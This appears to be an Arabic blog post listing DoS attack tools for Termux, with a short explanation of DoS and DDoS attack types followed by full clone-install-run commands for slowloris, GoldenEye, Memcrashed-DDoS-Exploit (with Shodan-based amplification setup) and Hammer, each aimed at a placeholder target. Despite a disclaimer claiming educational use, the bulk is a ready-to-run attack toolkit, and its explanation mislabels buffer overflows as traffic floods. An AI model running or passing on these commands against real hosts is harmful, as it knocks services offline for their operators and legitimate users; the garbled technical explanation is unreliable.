أقسام الوصول السريع ( مربع البحث )

أخر الاخبار

افضل أدوات دوس اتاك - Dos Attack لعام 2025

افضل أدوات دوس اتاك - Dos Attack لعام 2021
اليوم لقد جهزنا لكم قائمة في أفضل ادوات Dos

هذه الأدوات من اجل التعليم والحماية لست مسؤول عن سوء الاستخدام

الادوات تعمل على ترمكس (Termux)

ما هو هجوم Dos أو Ddos Attack


هجوم الحرمان من الخدمة (دوس) هو هجوم يهدف إلى إغلاق الجهاز أو الشبكة، مما يجعلها بعيدة عن متناول المستخدمين المقصودين. يحقق هجمات DoS ذلك عن طريق إغراق الهدف بحركة المرور ، أو إرسال معلومات تؤدي إلى حدوث عطل. في كلتا الحالتين ، يحرم هجوم DoS المستخدمين الشرعيين (أي الموظفين أو الأعضاء أو أصحاب الحسابات) من الخدمة أو المورد الذي توقعوه.

غالبًا ما يستهدف ضحايا هجمات DoS خوادم الويب الخاصة بالمؤسسات البارزة مثل البنوك والتجارة وشركات الإعلام أو المنظمات الحكومية والتجارية. على الرغم من أن هجمات DoS لا تؤدي عادةً إلى سرقة أو فقدان معلومات مهمة أو أصول أخرى ، إلا أنها قد تكلف الضحية قدرًا كبيرًا من الوقت والمال للتعامل معها.

هناك طريقتان عامتان لهجمات DoS: خدمات الإغراق أو تعطل الخدمات. تحدث هجمات الفيضانات عندما يتلقى النظام الكثير من حركة المرور بحيث لا يتمكن الخادم من تخزينها مؤقتًا ، مما يؤدي إلى إبطائها والتوقف في النهاية.

تشمل هجمات الفيضانات الشائعة ما يلي:

1. هجمات تجاوز سعة المخزن المؤقت - أكثر هجمات DoS شيوعًا. يتمثل المفهوم في إرسال المزيد من حركة المرور إلى عنوان الشبكة أكثر مما قام المبرمجون ببناء النظام للتعامل معه.

2. تدفق ICMP - يستفيد من أجهزة الشبكة التي تم تكوينها بشكل خاطئ عن طريق إرسال حزم مخادعة تقوم باختبار اتصال كل كمبيوتر على الشبكة المستهدفة ، بدلاً من جهاز واحد محدد فقط.

3. فيضان SYN - يرسل طلبًا للاتصال بخادم ، لكنه لا يكمل عملية تبادل الإشارات مطلقًا . يستمر حتى تشبع جميع المنافذ المفتوحة بالطلبات ولا يتوفر أي منها للمستخدمين الشرعيين للاتصال بها.

أما بالنسبة لهجمات DoS الأخرى فتستغل نقاط الضعف التي تتسبب في تعطل النظام أو الخدمة المستهدفة. في هذه الهجمات ، يتم إرسال المدخلات التي تستفيد من الأخطاء الموجودة في الهدف والتي تؤدي لاحقًا إلى تعطل النظام أو زعزعة استقراره بشدة ، بحيث لا يمكن الوصول إليه أو استخدامه.

نوع إضافي من هجمات DoS هو هجوم رفض الخدمة الموزع (DDoS) . يحدث هجوم DDoS عندما تقوم أنظمة متعددة بتنسيق هجوم DoS متزامن على هدف واحد. الاختلاف الأساسي هو أنه بدلاً من مهاجمته من موقع واحد ، يتم مهاجمة الهدف من عدة مواقع في وقت واحد.

يُعرف هذا النوع من الهجوم بأنه يشكل تهديدًا كبيرًا ويشكل مصدر قلق كبير للمنظمات التي تخشى أن يتم استهدافها من قبل مثل هذا الهجوم.

slowloris

الأداة مبنية بلغة python
الاوامر
apt update apt install python git -y git clone --depth=1 https://github.com/gkbrk/slowloris cd slowloris python3 -m pip install PySocks python setup.py install python slowloris.py -p {port} {target}
لمزيد من المعلومات
python slowloris.py -h

GoldenEye

الأداة بلغة بايثون
apt update apt install python git -y git clone --depth=1 https://github.com/jseidl/GoldenEye cd GoldenEye python goldeneye.py {target}
لمزيد من المعلومات
python goldeneye.py -h

Memcrashed-DDoS-Exploit

الأداة بلغة بايثون
apt update apt install python git -y git clone --depth=1 https://github.com/649/Memcrashed-DDoS-Exploit.git cd Memcrashed-DDoS-Exploit python3 -m pip install "scapy<=2.4.1" python3 -m pip install shodan python3 Memcrashed.py

عند دخولك الاداة ادخل y ثم انقر Enter

والان أدخل api حسابك المدفوع وليس المجانيي لان المدفوع يستخدم dorks أم المحاني فلا لذلك لن تعمل الاداة إذا استخدمت حساب مجاني

Hammer

الأداة بلغة بايثون
apt update apt install python git -y git clone --depth=1 https://github.com/cyweb/hammer cd hammer python3 hammer.py -s {target} -p {port} -t {thread}
لمزيد من المعلومات
python hammer.py -h

موقع Cyber-Wise.blogspot.com ليس مسؤول عن سوء الاستخدام كما قلت الادوات للتعليم والحماية.

إذا واجهت مشكلة اترك تعليقا
تعليقات



حجم الخط
+
16
-
تباعد السطور
+
2
-